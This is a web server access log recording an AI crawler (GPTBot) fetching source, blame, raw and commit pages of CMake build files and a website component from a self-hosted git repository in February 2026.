[Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/About.tsx" +[17/Feb/2026:17:03:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/components/About.tsx" +[17/Feb/2026:17:03:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12169] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:17:03:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 11325] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:17:03:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 11310] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:17:03:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 11284] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:17:03:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11371] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:17:03:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 16055] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:17:03:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 11655] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:17:03:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11733] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:17:03:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 11303] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:17:03:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 10009] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:17:04:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13920] [Gzip 8.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:17:04:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 10018] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:17:04:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12080] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:17:04:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10299] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:17:04:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10242] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:17:04:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10016] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:17:04:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10011] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:17:04:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10675] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:17:04:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11187] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:17:04:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10009] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:17:04:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 93] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:17:04:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 1035] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:17:04:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10364] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:17:04:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 14919] [Gzip 9.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:17:04:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 64] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:17:04:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10273] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:17:04:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:17:04:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10014] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:17:04:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 116] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:17:04:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10207] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:17:04:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:17:04:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 7690] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:17:04:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10018] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:17:04:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10029] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:17:04:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10019] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:17:04:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 10011] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:17:04:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 449] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:17:04:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 224] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:17:04:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 2693] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:17:04:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 9784] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/About.tsx" +[17/Feb/2026:17:04:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 552] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:17:04:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11371] [Gzip 4.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:17:04:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 842] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 